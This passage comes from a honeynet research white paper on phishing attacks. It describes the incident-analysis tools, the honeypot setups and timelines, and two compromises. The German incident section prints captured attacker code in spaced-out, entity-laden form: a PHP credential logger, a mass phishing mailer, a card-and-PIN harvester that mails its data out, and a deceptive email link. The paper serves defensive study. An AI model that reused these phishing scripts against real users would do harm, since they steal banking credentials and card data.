This is a poor translation from English to German, probably computer-generated, and it suggests that the attackers are not native English speakers. Since the money will be transferred to Russia, the attacker probably originated from this country. This behaviour is becoming increasingly common as phishing activities become more organised.

Honeysnap - An Incident Analysis Assistant
One conclusion was immediately obvious when we started to analyse data from the UK honeynet compromise in phishing technique one above - due to multiple simultaneous attacks by different blackhat groups, a significant amount of time would be required to extract and prepare the data from the network streams before more detailed analysis could take place. This data extraction process is repetitive and tedious, and if carried out manually represents an inefficient use of valuable analysis time. An automated solution was required. The honeysnap script, written by David Watson of the UK Honeynet Project, grew out of this idea and was designed to process honeynet data feeds on a daily basis and produce a simple summary output to direct later manual analysis. The honeysnap script breaks down the data for each honeypot and provides lists of outbound HTTP and FTP GETs, IRC messages and Sebek keystroke logs. TCP stream re-assembly for interesting connections is automated, as is extraction, identification and storage of files downloaded by FTP or HTTP, meaning that much of the time-consuming preparatory work of incident analysis is removed, leaving the analysts free to concentrate on manually investigating key elements of an incident. Honeysnap also provides an automated method for screening IRC traffic for interesting keywords (e.g. bank, account, password) and providing daily summary reports by email. Currently honeysnap is a basic proof of concept UNIX shell script and the alpha release can be found here, whilst a set of sample honeysnap output can be found here. A modular and fully

expandable version written in Python is currently under development by members of the Honeynet Project and will be beta released to the community in June 2005.

Further Research
The information presented in this white paper suggests a number of potential avenues for future research in the area of phishing attacks and we would recommend further investigation of the following subjects: We would like to investigate if honeypots can be used to help in the fight against spammers and phishers. One possible research project would be to deploy additional honeypots of a type regularly used in previously observed phishing attacks or tuned to present attractive targets to spammers (such as SMTP open relays). Analysis of further attacks against these systems would help us to learn more about the anatomy of phishing attacks, particularly in the area of phishing using botnets, and to track the evolution of phishing techniques. Another research possibility would be to further develop the idea of honeypots and produce "client-side honeypots". This type of next-generation honeypot would actively participate in communication networks, for example, by automatically follow links in spam emails and accessing the target content. Client-side honeypots could idle in IRC-channels or share/download files via peer-to-peer networks, further improving our knowledge about the type of threats present in these communication networks. In addition, we would like to investigate potential methods of countering or stopping phishing attacks. Since the time window between the start and end of a phishing attack is likely to be limited to a matter of only hours or days, and the source hosts are widely distributed, this is a difficult task. Current research efforts in this area (for example The AntiPhishing Group and PhishReport) concentrate on collecting phishing emails received by end users. Whilst this is a viable approach, capture occurs at the final stage in the incident lifecycle. An automated approach to capturing and responding to phishing attacks would be more desirable. We suspect that accounts and passwords are being traded between blackhat groups, probably via IRC. Honeynet technology could be used to capture such communication and further understand phishing activities. In addition, phishing tools often appear to be downloaded from a number of regularly updated central web or FTP servers. Although more contentious, monitoring of such activity or contacting the system owners would help to prevent some phishing activity, and a framework for operating such research and potential countermeasures could be established. Further work is required to improve the automation of incident analysis, particularly in automatic profiling of data captured during such attacks. Automation of traffic and IP address extraction, reverse DNS and IP block ownership lookups, per IP address or per domain traffic summaries and en-masse passive operating system fingerprinting would all be particularly useful when analysing large data sets, as would a local forensic database of known hosts, attackers, attack signatures, message contents, etc. In the longer term, agreed standards for sharing such information and a global forensic database to support analysis of distributed blackhat activities would be highly desirable and of significant benefit to the community.

Conclusions
In this paper we have presented a number of real world examples of phishing attacks and the typical activities performed by attackers during the full lifecycle of such incidents. All the information provided was captured using high interaction research honeypots, once again proving that honeynet technology can be a powerful tool in the areas of information assurance and forensic analysis. We analysed multiple attacks against honeypots deployed by the German and UK Honeynet Projects. In each incident phishers attacked and compromised the honeypot systems, but after the initial compromise their actions differed and a number of techniques for staging phishing attacks were observed: 1. 2. 3. 4. Setting up phishing web sites targeting well known online brands. Sending spam emails advertising phishing web sites. Installing redirection services to deliver web traffic to existing phishing web sites. Propagation of spam and phishing messages via botnets

This data has helped us to understand how phishers typically behave and some of the methods they employ to lure and trick their victims. We have learned that phishing attacks can occur very rapidly, with only limited elapsed time between the initial system intrusion and a phishing web site going online with supporting spam messages to advertise the web site, and that this speed can make such attacks hard to track and prevent. IP address blocks hosting home or small business DSL addresses appear to be particularly popular for phishing attacks, presumably because the systems are often less well managed and not always up to date with current security patches, and also because the attackers are less likely to be traced than when targeting major corporate systems. Simultaneously attacking many smaller organisations also makes incident response harder. We have observed that end users regularly access phishing content, presumably through receiving spam messages, and a surprisingly large number appear to be at risk from becoming victims of such attacks. Our research also suggests that phishing attacks are becoming more widespread and well organised. We have observed pre-built archives of phishing web sites targeting major online brands being stored, ready for deployment at short notice, suggesting the work of organised phishing groups. Such content can be further propagated very quickly through established networks of port redirectors or botnets. When coupled with evidence of mass scanning and hard coded IP addresses in web content and scripts, this suggests that many instances of a particular phishing site may be active at any one time. Web traffic has been observed arriving at a newly compromised server before the uploaded phishing content was completed, and phishing spam sent from one compromised host does not always appear to advertise the sending host, which again suggest it is likely that distributed and parallel phishing operations are being performed by organised groups. Our research demonstrates a clear connection between spamming, botnets and phishing attacks, as well as the use of intermediaries to conceal financial transfers. These observations, when combined with quantitative data on mass vulnerability scanning and combined two-stage phishing networks, demonstrate that the threat posed by phishers is real, their activities are organised, and the methods they employ can sometimes be quite advanced. As the stakes become higher and the potential rewards become greater, it is likely that further advancements in phishing techniques and an increase in the number of phishing attacks will continue in the coming year. Reducing the number of vulnerable PCs contributing to botnets, countering the increasing volume of spam email, preventing organised criminal activity and educating Internet users about the potential risks from social engineering all remain significant security challenges. A summary of all the linked sub-sections of this paper that provide supporting detail can be found below: More detailed background information about phishing Details of UK compromise (timeline) Details of UK compromise (content analysis) UK attacker mole session Analysis of UK phishing victim source IP addresses Overview of German and UK honeynet configurations Details of German honeypot compromise German attacker sessions German PHP script analysis Analysis of German phishing victim source IP addresses Learning about phishing from bot source code Honeysnap sample output Questions and comments should be directed to the German Honeynet Project and the UK Honeynet Project.

Appendix

Additional Informations

Background on Phishing Attacks
This side note provides further detailed background on phishing attacks, beginning with a historic overview of phishing and social engineering, and concluding with quantitative data on phishing attempts and information on high level trends. During the 1990’s, as the popularity and take up of the Internet grew, social engineering was gradually transformed and attackers began to focus on the mass consumer market. Phishers moved from AOL to the unregulated and more anonymous Internet, with email becoming the preferred medium for engaging (often naïve) end users. One reason for this change of focus might be that online discussion forums, IRC and instant messaging were increasingly portrayed by the press as dangerous places, where evildoers and system crackers waited to ambush unsuspecting users. Also, users had become aware that legitimate companies nearly exclusively use telephone, email and traditional postal mail as means of communication with their customers, rarely participating in less formal chat sessions. Users had also become more familiar with and confident in trusting web based authentication systems, e-shopping with credit cards, online banking services and the protection offered by technologies such as Secure Sockets Layer (SSL) - all fronted by a myriad of different looking user interfaces. Internet based email solutions continued to evolve at a rapid rate, with increasingly complex methods being offered to customise the look and feel of email messages and therefore potentially fooling unsuspecting users into trusting spoofed communications that might appear to be legitimate. When compared to established and relatively well policed closed loop systems, it still remains difficult for consumers to trace the exact origin of an SMTP mail message, and the available global user base of Internet email is many times larger. Even activities with a very low success rate can still be attractive to an attacker if the number of end users receiving the message is large enough to generate a number of responses, as can be witnessed by the continued growth in organisations willing to pay for the sending of spam and many users' own experiences of inboxes regularly full of unsolicited email. In a more sinister turn, phishers have not only changed their primary means of communication to email, they have also started operating in a more organised manner and to target their attacks against more profitable information. In recent years, requests for AOL accounts or single credit card numbers have gradually been replaced with schemes aimed at obtaining more sensitive data, such as personal information that could allow unlimited access to online banking services or that could serve as a foundation to enable identity theft. Sensitive information to fraudulently impersonate another person’s identity might include name, date of birth, address, social security number or "secret" information such as mother's maiden name, account numbers, first school, pet’s name, user names, passwords, Personal Identification Numbers (PINs) or even one-time passwords (which are quite common in European Internet banking). The following chart that shows the top corporate phishing targets based on responses in a recent survey of spam recipients (October 2004) by email security company CipherTrust: [image:../images/targets.PNG size=full] Phishing attacks have affected many users and have caused serious problems for some major banks. In extreme cases, some banks have been forced to shut down their ebanking operations for period of time due to phishing attacks. The exact cost to the banking industry of phishing attacks is not available in the public domain, and there are few well documented qualitative examples of public arrests and prosecution (such as in Estonia or Brazil), but it is likely to be substantial. In most cases banks will refund the money lost by their customers due to phishing attacks, although they reserve the right not to refund such losses at their discretion. Estimates by the Association for Payment Clearing Services (APACS) for the cost of phishing attacks against UK banks were £1M for the previous 18 months to April 2004, rising to £12M by March 2005. Australian estimates for March 2005 were A$25M, whilst Financial Insights estimates the cost to US business to be $400M in 2004. A study by Gartner estimated the cost in 2003 to be $1.2B and the number of reported phishing attacks have massively increased since then. In October 2004 the Anti-Phishing Working Group reported that it had seen 6597 new phishing emails, an increase of 36% on the previous month. 1142 phishing web sites were reported, double the number for September and part of a "bumper month" during a period of huge growth in automated phishing attacks. Email filtering specialist MessageLabs reported that it intercepted more than 18 million phishing messages during 2004, and the graph below clearly shows the growth in attempted phishing attacks by email: [image:../images/phishing-mails.PNG size=full] The loss of trust, impact on consumer confidence and the associated financial costs of phishing attacks have become important enough for banks to set up web sites such as BankSafe Online to try and educate their customers, and most target brands now provide sections of their official web site with advice on identifying and avoiding online scams (such as Citizen Bank's "Online Fraud Prevention Centre" or Citibank's "Learn About Spoofs" pages ). Other organisations such as the Anti Phishing Working Group are also hoping to educate consumers as to the potential risks and teach Internet users how to avoid online scams such as phishing attacks. However, the main challenge in preventing phishing attacks is that phishing is not a pure technology problem - the major contributing factor is human nature, and as long as attackers can continue to create schemes to trick unwary users, phishing will continue to be successful and potentially lucrative. As Bruce Schneier writes in a recent weblog, even issuing all end users with two-factor authentication doesn't really help to solve the problem if the phisher is successful in tricking the users into authenticating themselves against a fake, malicious system. Given the combination of human nature, the rapid rate of technological change and the potential for illegitimate profits to be made, it seems safe to assume that the problem of phishing will get worse before it gets better.

Detailed analysis of two phishing incidents
his side note provides a more detailed overview of the two incidents discussed in the "Phishing Technique One - Phishing Through Compromised Web Servers" section of this whitepaper. One incident was catpured using a honeypot deployed by the German Honeynet Project, and the other incident was captured by a honeypot deployed by the UK Honeynet Project.

Setup and Timeline for German Honeynet Project Phishing Incident
The honeynet deployed and analysed by the German Honeynet Project in the first incident formed part of a diploma thesis ("Planung und Realisierung eines Honeynet zur Analyse realer Angriffe aus dem Internet") by a graduate student at MAGELLAN Netzwerke GmbH in Cologne, Germany. The honeynet was a high interaction research honeynet deployed by the German Honeynet Project during November 2004. The honeynet topology is depicted below: [image:../images/honeynet.png size=full] The honeynet deployed was a typical GenII honeynet based on the three basic principles defined by the Honeynet Project: data capture, data control and data analysis. Data capture was performed by recording all inbound and outgoing network traffic for later analysis, using packet sniffing tools such as tethereal. All network traffic to and from a RedHat Linux honeypot was mirrored via the monitor port of a network switch and logged using the popular open source Intrusion Detection System snort running in binary capture mode (as daily pcap files). To allow keystroke logging after a successful system compromise, version 2.1.7 of the Honeynet Projects Sebek kernel module was installed on the honeypot. The Redhat syslog daemon was also modified to output syslog information to the serial port for capture by the honeynet gateway. For data control , all network traffic from the Internet was routed through a transparent bridging honeynet gateway running the FreeBSD release 4.10 operating system that limited outgoing network connections from the honeypot. Outgoing connections were identified by SYN packets, differentiated and logged by TCP connection types (such as IRC-connections), and the number of connections limited to 15 IRC-connections and 10 other TCP-connections with a 24 hour period. Connection limiting is designed to allow attackers to successfully compromise the honeypot and download a limited amount of rootkits or other malware from external servers, but to then limit their potential to attack further hosts from the compromised honeypot. It also helps to hide the presence of the honeynet gateway by not totally blocking all outbound traffic, along with preventing denial of service attacks. For data analysis, all network traffic to or from the honeypot was mirrored to a snort IDS for pattern matching against the current signature rulebase. Manual and automated analysis of logged data was performed regularly, along with real time monitoring and alerting.

The honeynet gateway was connected to a central network switch which was used to separate network traffic from the honeypot system network and the administrative network using VLANs, a common method to logically segmented network on the same physical hardware. The honeypot itself was a standard installation of RedHat Linux version 7.1 on Intel hardware running the latest version 2.4.20 kernel with several network services such as FTP (wu-2.6.1-16), HTTP (Apache 1.3.19, OpenSSL/0.9.6) and a database (MySQL 3.23.36) server enabled. All services were left in their default configuration, except for the MySQL database which had a random secure password set for the root user. To make the system more realistic and more closely simulate a production system, a mocked up web site for an imaginary sales company was installed and reverse DNS added for the web server. The following table depicts the timeline of the incident: Date / Time Event 12/11/04 First data from honeypot

22/11/04 Honeypot WU-FTPd compromised by autorooter 01:06 AM 22/11/04 Attacker manually installs rootkit, IRC bot and Ebay phishing attack content 08:21 AM 22/11/04 Attacker returns to install and run mass scanning tool 06:25 PM 22/11/04 Attacker returns to install proxy server 10:40 PM 23/11/04 Attacker returns to install additional rootkit 02:25 PM 23/11/04 Attacker returns to set up phishing web sites and sends out spam mails (blocked by Honeywall) 04:40 PM 08/12/04 Honeypot disconnected for forensic analysis 11:30 AM

A more detailed incident timeline, including an analysis of the tools and techniques the attackers used, is available here.

Setup and Timeline for UK Honeynet Project Phishing Incident
The honeynet deployed and analysed by the UK Honeynet Project in the second phishing incident was a high interaction research honeynet deployed in a UK ISP data centre during August 2004. [image:uk-honeynet_files/image001.jpg size=full] The UK Honeynet deployment was similar in broad outline to the German honeynet configuration detailed above, being composed of a number of physical honeypots running default installations of common UNIX operating systems on Intel and Sparc hardware. The Honeynet Projects Honeywall bootable CDROM was used for data control, providing a transparent bridging iptables firewall and using network connection rate limiting plus the snort-inline IPS to restrict outbound attack traffic. Another snort IDS provided data capture in binary pcap format, along with snort and snort-inline alerting and automated daily script based data analysis . Individual honeypots were hosted behind the Honeywall gateway, connected to an Ethernet hub, and the Honeynet project's Sebek loadable kernel module was covertly installed and enabled on each honeypot to allow full keystroke logging. All network traffic to and from the honeypots was logged in pcap format, as were any keystrokes recorded using Sebek. Any compromised hosts were eventually taken off line and imaged for later forensic examination. The RedHat Linux 7.3 server on Intel hardware honeypot that was compromised and used to host a phishing attack was a default CDROM based installation with a number of common network services such as Apache and samba enabled and left un-patched. Again, a timeline of the incident is given: Date / Time Event 17/08/04 18/08/04 Honeypot samba server compromised. Various IRC tools, backdoors and mass scanners installed by multiple groups 12:30 PM 19/08/04 20/08/04 Attackers check result of network scans New attackers compromise honeypot More scanning activity First data from honeypot

22/08/04 23/08/04 09:12 PM 23/08/04 09:23 PM 27/08/04 09:30 AM Phishers arrive through back door set up by initial attackers and set up phishing website

First web traffic arrives at web server for phishing site Honeypot disconnected for forensic analysis

A more detailed incident timeline of the UK phishing incident can be found here and more detailed analysis, including an analysis of the tools and techniques the attackers used, can be found here.

Details of German compromise
On November 12, 2004, the Honeynet was connected to the Internet. During the time between the start up and November 22, nothing special happened. We just observed an enormous number of packets with destination port 445 which is not critical for the installed Honeypot. At 1:16 am the Honeypot got compromised by exploiting the WU-FTP daemon. There was no port scan or FTP connection before, the first connect was used to hack the computer which is an indication of an autorooter-tool. Such tools are used to scan whole network ranges for vulnerable machines and attack everything they come across. They just deliver their "evil" payload to every system in the given address range. In our case, it was probably a tool called s u p e r w usince later on, the attacker used this tool to attack further targets from the Honeypot. Until 8:21 am there was no activity from the attacker. Probably he started the tool the night before and checked in the morning for successful gained access. As a first step he downloaded a rootkit and installed it on the Honeypot. This script-based rootkit replaces some system binaries with trojaned files: /usr/bin/dir /sbin/ifconfig /bin/netstat /usr/bin/strings /usr/bin/top /usr/bin/slocate /usr/bin/vdir /usr/bin/chattr /bin/ps /usr/bin/pstree /usr/bin/socklist /usr/sbin/lsof

In addition, it install an SSH-daemon on port 255 which was used by the attacker to log on the Honeypot in the following. The rootkit uses source code to compile new versions of binary files. These trojaned executables are adjusted to the size of the original files of the target system to "hide" the presence. The rootkit also installs a sniffer to collect login information to other systems. Furthermore, it modifies the init-scripts to ensure that the installed services will start on next reboot and then sends out an information mail about the system status to the attacker. After finishing the installation, the attacker reentered the Honeypot via the additionally installed SSH service using the tool "putty", an SSH-Client for Windows-systems. Afterwards the attacker downloaded a file called spam.tgz. This archive contains some PHP and HTML files. Further examination showed that these files contain web-pages to update the billing profile update for seller accounts of a large Internet auctions website. The attacker copied this files into the document root of the webserver. The "index.html" start page is a forwarding page to the auctions website. The reason for that is that these PHP pages were incomplete. The attacker edited them, but never finished his work on this files. By tracing the IP of the attacker, the source could be located in Romania. A scan of this computer showed no open ports, so this could be the computer of the cracker. At8:49 am the attacker downloaded another file: psybnc.tgz. After extracting the archive, he installed the included IRC-Bouncer and started an IRC-Session to an "undernet.org" server. The channel he entered was probably used to control hacked systems. A scan of all 8 connected clients showed the same untypical open port 255 with a listening SSH-daemon like the Honeypot had. The attacker also entered another channel and received Operator-rights there. The topic on this channel was a pointer to his personal homepage and the language used in that channel was Romanian. At6:25 pm the attacker came back and downloaded the file windmilk.tgz. This archive contains the "superwu" autorooter. After extracting the executable binary file, he started the exploiter in a screen-session with a target network as parameter. Then the attacker detached the session and logged off. Later when he came back, he attached the session again to see the results. Since the Honeywall blocked all attacks, no systems could be compromised. The attacker did not realize the intervention, downloaded and installed at 10:40 pm a "socksify" proxy which was configured without any restrictions. With this service anybody could use the Honeypot as a proxy for spreading spam or anonymous connections to any other systems. During the honeynet's online time, it was never used. On November 23, 2004, the attacker came back at 2:25 pm. He added the user "ro" and installed another rootkit. In a side note we present the recording of this session captured by the snort binary logging. At 4:40 pm, the attacker downloaded the archive willson.tgz. This file includes already finished webpages similar to the spam.tgz archive. The attacker installed them in the document root directory of the webserver. Now this Honeypot could be used for phishing attacks. By calling the startup page, you get a login page that looks like the original login page. While unrelated to the incident we report, a recent example illustrating the similarity of a phishing data entry form to compare to the acutal site can be found here. The input of this form will be rudimentary checked with the help of a small PHP-script
< e m > & l t ; ? p h p/ / c h k :i f ( s t r l e n ( $ u s e r i d ) & l t ; 1| |s t r l e n ( $ p a s s ) & l t ; 1 ){e c h o' I n v a l i du s e r / p a s s w o r d ' ;}e l s e{$ m e s a j=& q u o t ; $ u s e r i d$ p a s s & q u o t ; ; h e a d e r( & q u o t ; L o c a t i o n : v e r i f y . h t m l & q u o t ; ) ;$ m u i e=f o p e n ( & q u o t ; / t m p / U s e r . d o c & q u o t ; ,& q u o t ; w & q u o t ; ) ;f w r i t e ( $ m u i e ,$ m e s a j ) ;f c l o s e ( $ m u i e ) ; e x i t ( ) ;}? & g t ; < / e m >

For both input fields (username and password), the input must be longer than one character. Note the use of the strings $mesaj and $muie, which suggests a Romanian connection and have been observed in other incidents analysed by members of the UK Honeynet Project. If the input is okay, it will be written to the file / t m p / U s e r . d o cand the next page will be shown. On this page, the victim is tricked into entering personal information. All input will be checked and if one is not according to the condition, an error page will be shown. This error page does not attempt to mimic the real error page and most victims would likely become suspicious of the fake web site at this point. With the help of the following validation script, the data entered into the form is checked. The resulting page of the validation process is not interpreted by the webserver because Apache does not accept . d l lfiles as PHP files by default. The attacker forgot to set the "AddType" variable of the Apache server to interpret . d l lfiles with the PHP-engine. The next activity of the attacker was downloading an archive called banksend.tgz. This file includes a PHP script for sending mails:
< e m > & l t ; ? p h pi n c l u d e ( & q u o t ; i n i . i n c & q u o t ; ) ;$ m a i l _ h e a d e r=& q u o t ; F r o m :s u p p o r t @ B a n k . c o m & l t ; s u p p o r t @ B a n k . c o m & g t ; \ n & q u o t ; ;$ m a i l _ h e a d e r. = & q u o t ; C o n t e n t T y p e :t e x t / h t m l \ n & q u o t ; ;$ s u b j e c t = & q u o t ; B a n kS e c u r i t yD e p a r t m e n t& q u o t ; ;$ b o d y = l o a d i n i ( & q u o t ; t e s t . t x t & q u o t ; ) ;i f( ! ( $ f p= f o p e n ( & q u o t ; l i s t . t x t & q u o t ; ,& q u o t ; r & q u o t ; ) ) )e x i t ( & q u o t ; U n a b l et oo p e n$ l i s t F i l e . & q u o t ; ) ;$ i = 0 ;p r i n t& q u o t ; S t a r tt i m ei s& q u o t ; ;p r i n t d a t e ( & q u o t ; Y : m : dH : i & q u o t ; ) ;p r i n t& q u o t ; \ n & q u o t ; ;w h i l e( ! f e o f ( $ f p ) ){f s c a n f ( $ f p ,& q u o t ; % s & q u o t ; ,$ n a m e ) ;$ i + + ;m a i l ( $ n a m e ,$ s u b j e c t ,$ b o d y , $ m a i l _ h e a d e r ) ;}p r i n t& q u o t ; E n dt i m ei s& q u o t ; ;p r i n td a t e ( & q u o t ; Y : m : dH : i & q u o t ; ) ;p r i n t& q u o t ; \ n & q u o t ; ;p r i n t& q u o t ; $ i & q u o t ; ;p r i n t & q u o t ; e m a i l ss e n t . & q u o t ; ;p r i n t & q u o t ; \ n & q u o t ; ;? & g t ; < / e m >

After downloading the test.txt file which contained 3719 e-mail addresses, the attacker started sending phishing mails to the recipients listed in this file. The source code of this file shows the

real target of the comprised link: Please follow the link below and renew your account information. <br><br> <a href=" http://XXX.XXX.XXX.XXX/Checking/login.php" onClick="popup('http://www.totalmates.com/php/click.cgi?id=xakir')" onMouseOver="window.status='https://internetbanking.bank.com';return true;" onMouseOut="window.status=' ';return true;">https://internetbanking.bank.com</a> <br> <br> At this point of time we decided to block outgoing TCP ports 25 and 443 so that no victim would suffer from the phishing attacks. The attacker probably noticed that we blocked outgoing connections and concluded that something weird was happening. He never came back and on Decembers 8, 2004, the honeynet went offline for further analysis. What else did we find? We found archives which contained pre-packaged pages for other major banks. These pages are used for gathering credit card numbers from the victims. For example, in one case the form input will be checked with the help of JavaScript and the only condition is that the input fields are not blank. The next script sends the data to the attacker:
< e m > & l t ; ? p h ps e s s i o n _ s t a r t ( ) ;$ l o g 0=$ _ P O S T [ ' C A R D _ N U M B E R ' ] ;$ l o g 1 =$ _ P O S T [ ' C V V 2 ' ] ;$ l o g 2=$ _ P O S T [ ' M O T H E R S _ M A I D E N _ N A M E ' ] ;$ l o g 3= $ _ P O S T [ ' E M A I L ' ] ;$ l o g 4=$ _ P O S T [ ' n m c ' ] ;$ l o g 5=$ _ P O S T [ ' a d d r ' ] ;$ l o g 6=$ _ P O S T [ ' c d ' ] ;$ l o g 7=$ _ P O S T [ ' p i n ' ] ;$ l o g 8=$ _ P O S T [ ' c o u n t r y ' ] ;$ l o g 9= $ _ P O S T [ ' c i t y ' ] ;$ l o g 1 0=$ _ P O S T [ ' s t a t e ' ] ;$ l o g 1 1=$ _ P O S T [ ' e x p ' ] ;$ l o g 1 2=$ _ P O S T [ ' u s e r ' ] ;$ l o g 1 3=$ _ P O S T [ ' p a s s w o r d ' ] ;$ l o g 1 4= $ _ P O S T [ ' b a n k n a m e ' ] ;$ l o g 1 5=$ _ P O S T [ ' b a n k r o u t i n g ' ] ;$ l o g 1 6=$ _ P O S T [ ' c h e c k i n g a c c o u n t ' ] ;$ l o g 1 7=$ _ P O S T [ ' b a n k a c c ' ] ;$ t d=d a t e ( & q u o t ; F j S & q u o t ; ) ;$ d a t e=d a t e ( & q u o t ; dM ,Y & q u o t ; ) ;$ t i m e=d a t e ( & q u o t ; g : ia & q u o t ; ) ;$ L o g T i m e=t r i m ( & q u o t ;D a t e :& q u o t ; . $ d a t e . & q u o t ; ,T i m e : & q u o t ; . $ t i m e) ;m a i l ( & q u o t ; X X X X X X @ y a h o o . c o m & q u o t ; ,& q u o t ; B a n kR e s u l t s & q u o t ; ,& q u o t ; $ l o g 0 \ n $ l o g 1 \ n $ l o g 2 \ n $ l o g 3 \ n $ l o g 4 \ n $ l o g 5 \ n $ l o g 6 \ n $ l o g 7 \ n $ l o g 8 \ n $ l o g 9 \ n $ l o g 1 0 \ n $ l o g 1 1 \ n $ l o g 1 2 \ n $ l o g 1 3 \ n $ l o g 1 4 \ n $ l o g 1 5 \ n $ l o g 1 6 \ n $ l o g 1 7 & q u o t ; ) ;h e a d e r( & q u o t ; L o c a t i o n :p r o c c e s s i n g . h t m l & q u o t ; ) ; e x i t ;? & g t ;< / e m >

After this validation, the file processing.html shows just the text: "Thank you, Our update team will verify provided information and you will be contacted". In another bank page, we found the input will not be checked for reasonable values. Instead, it will be just send to the attacker by mail after using the "Save" button. Furthermore, we found a mailer-script for a US bank which works like the mailer-script. It is a simple PHP script that reads e-mail addresses from a separate file and sends the contents of another file. The recipient file includes 83,073 mail addresses.

Analysis of German attacker's sessions
This side note shows the commands issued by the phisher from the perspective of the attacker. Their actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rookit was installed, which were again reconstructed with the help of Snort log-files. Screenshot of the rootkit installation: [image:../../images/rootkit_screenshot.png size=full] Commands issued by the attacker:
/ u s r / s b i n / a d d u s e rr o p a s s w dr o 0 0 3 0 9 3 4 0 4 0 8 7 7 0 0 3 0 9 3 4 0 4 0 8 7 7 C h a n g i n gp a s s w o r df o ru s e rr o p a s s w d :a l la u t h e n t i c a t i o nt o k e n su p d a t e ds u c c e s s f u l l y f t pv2 0 4 . 9 2 . x x x . x x x C o n n e c t e dt o2 0 4 . 9 2 . x x x . x x x . 2 2 0F t ps e r v e rr e a d y . c h o o s e N a m e( 2 0 4 . 9 2 . x x x . x x x : r o o t ) :3 3 1U s e rc h o o s eo k a y ,n e e dp a s s w o r d . a 5 3 0L o g i ni n c o r r e c t . b y e R e m o t es y s t e mt y p ei sU N I X . U s i n gb i n a r ym o d et ot r a n s f e rf i l e s . 2 2 1G o o d b y e . f t pv2 0 4 . 9 2 . x x x . x x x C o n n e c t e dt o2 0 4 . 9 2 . x x x . x x x . 2 2 0F t ps e r v e rr e a d y . e x a m p l e N a m e( 2 0 4 . 9 2 . x x x . x x x : r o o t ) :3 3 1U s e re x a m p l eo k a y ,n e e dp a s s w o r d . c h o o s e 2 3 0 Y o ua r eu s e r# 1 4o f3 5 0s i m u l t a n e o u su s e r sa l l o w e d . 2 3 0 2 3 0R e s t r i c t e du s e rl o g g e di n . h a s h p a s s d e b b i n R e m o t es y s t e mt y p ei sU N I X . U s i n gb i n a r ym o d et ot r a n s f e rf i l e s . H a s hm a r kp r i n t i n go n( 1 0 2 4b y t e s / h a s hm a r k ) . P a s s i v em o d eo f f . D e b u g g i n go n( d e b u g = 1 ) . >T Y P EI 2 0 0T y p eo k a y . c dc g i b i n >C W Dc g i b i n 2 5 0" / c g i b i n "i sn e wc w d . c dr o o t k y t >C W Dr o o t k y t l s 2 5 0" / c g i b i n / r o o t k y t "i sn e wc w d . >T Y P EA 2 0 0T y p eo k a y . >P O R T2 1 2 , 4 4 , 1 6 1 , 1 1 5 , 9 , 1 3 6 2 0 0P O R Tc o m m a n ds u c c e s s f u l . >L I S T 1 5 0O p e n i n gA S C I Im o d ed a t ac o n n e c t i o nf o r/ b i n / l s . r w r r -1f t p u s e rw e b2 1 1 9 4 1 5 6S e p60 6 : 4 1l i s t . t x t . t x t r w r r -1f t p u s e rw e b7 2 3 1 2 8J u n2 11 5 : 0 1s u p e r w u . t g z 2 2 6L i s t i n gc o m p l e t e d . c d. . >C W D. . 2 5 0" / c g i b i n "i sn e wc w d .

l s >P O R T2 1 2 , 4 4 , 1 6 1 , 1 1 5 , 9 , 1 3 7 2 0 0P O R Tc o m m a n ds u c c e s s f u l . >L I S T 1 5 0O p e n i n gA S C I Im o d ed a t ac o n n e c t i o nf o r/ b i n / l s . r w r r -1f t p u s e rw e b4 1 0 7 3 1 8F e b2 22 0 0 4S S . t g z r w r r -1f t p u s e rw e b5 5 2 7 1A u g60 8 : 0 2B a n k . z i p r w r r -1f t p u s e rw e b0S e p2 41 6 : 1 0a w . t g z r w r r -1f t p u s e rw e b1 5 2 8M a y2 52 0 0 4e m a i l . t g z r w r r -1f t p u s e rw e b0S e p2 61 1 : 0 8l i m b a 1 . t g z r w r r -1f t p u s e rw e b5 2 2 5 0A u g91 5 : 2 0l i m b o s . t g z r w r r -1f t p u s e rw e b5 0 1 7 7M a y2 32 0 0 4m u i e . t g z r w r r -1f t p u s e rw e b0S e p2 60 9 : 0 1n e w 2 . t g z d r w x r x r x2f t p u s e rw e b5 1 2S e p1 41 1 : 3 4w e b s i t e r w r r -1f t p u s e rw e b1 0 2 2 4 0J u n41 6 : 4 6w e b s i t e . t a r . g z r w r r -1f t p u s e rw e b1 0 2 2 2 3J u n41 6 : 4 5w e b s i t e . t g z r w x r x r x1f t p u s e rw e b3 3 5 0 0 6 3J u l91 7 : 3 9p h p r w r r -1f t p u s e rw e b0S e p3 01 5 : 0 7p u l a m e a . t g z d r w x r x r x2f t p u s e rw e b5 1 2S e p60 6 : 2 9r o o t k y t r w r r -1f t p u s e rw e b5 0 2 0 0M a y2 32 0 0 4s a v a d a u l a m u i e . t g z r w r r -1f t p u s e rw e b1 9 6 0A u g30 6 : 2 4s e n d . t g z r w r r -1f t p u s e rw e b2 0 8 6S e p2 21 5 : 0 4s e n d s p a m . t g z r w r r -1f t p u s e rw e b0O c t30 8 : 0 9s p a m . t a r . g z r w r r -1f t p u s e rw e b5 2 2 3 6A u g30 6 : 1 2s p a m 1 . t g z r w r r -1f t p u s e rw e b5 0 1 7 6S e p2 21 4 : 2 9s p a m u l . t g z r w r r -1f t p u s e rw e b2 7 5 8M a y2 62 0 0 4t r i m i t e . z i p 2 2 6L i s t i n gc o m p l e t e d . c d. . >C W D. . l s 2 5 0" / "i sn e wc w d . >P O R T2 1 2 , 4 4 , 1 6 1 , 1 1 5 , 9 , 1 3 8 2 0 0P O R Tc o m m a n ds u c c e s s f u l . >L I S T 1 5 0O p e n i n gA S C I Im o d ed a t ac o n n e c t i o nf o r/ b i n / l s . d r w x r x -5f t p u s e rw e b5 1 2O c t2 51 0 : 5 9c g i b i n d r w x r x -4f t p u s e rw e b1 0 2 4N o v1 41 7 : 2 1w w w 2 2 6L i s t i n gc o m p l e t e d . c dw w w >C W Dw w w l s 2 5 0" / w w w "i sn e wc w d . >P O R T2 1 2 , 4 4 , 1 6 1 , 1 1 5 , 9 , 1 3 9 2 0 0P O R Tc o m m a n ds u c c e s s f u l . >L I S T 1 5 0O p e n i n gA S C I Im o d ed a t ac o n n e c t i o nf o r/ b i n / l s . r w r r -1f t p u s e rw e b1 3 9 9 6A p r2 22 0 0 4a s p . t g z r w r -1f t p u s e rw e b6 9 5J a n2 12 0 0 3i n d e x . h t m r w r r -1f t p u s e rw e b8 2 2 1 1O c t2 02 0 0 3l o c a l . t g z r w r r -1f t p u s e rw e b3 7 9 